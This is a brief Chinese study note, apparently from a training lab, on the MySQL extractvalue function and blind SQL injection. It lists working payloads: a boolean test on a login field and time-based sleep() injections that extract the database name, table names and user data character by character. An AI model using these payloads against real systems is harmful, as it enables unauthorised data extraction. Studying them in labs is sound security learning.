本文介绍了如何利用extractvalue函数对XML文档进行查询,并通过具体Payload实例展示了SQL盲注技术的应用,包括延时注入技巧。
这一节让我学习到了
1.extractvalue函数(该函数用于对xml文件进行查询和修改,于此相关的还有一个叫“updatexml”函数)
语法:extractvalue(XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
作用:从目标XML中返回包含所查询值的字符串
关于该函数的介绍使用:http://www.blogjava.net/chenpengyi/archive/2006/07/11/57578.html
2.
Payload:
admin" and 1=1#
这题方法也是要用盲注。
------------------------------------------------------------------------------------------------
延时Payload:
猜数据库:admin" and if(ascii(substring(database(),1,1))=115,sleep(10),1)--+
猜表:admin" AND if(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>1,sleep(20),1)#
猜列明:admin" AND if(ascii(substr((select username from security.users order by id limit 0,1),2,1))=117,sleep(10),1)#
------------------------------------------------------------------------------------------------
THE END
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
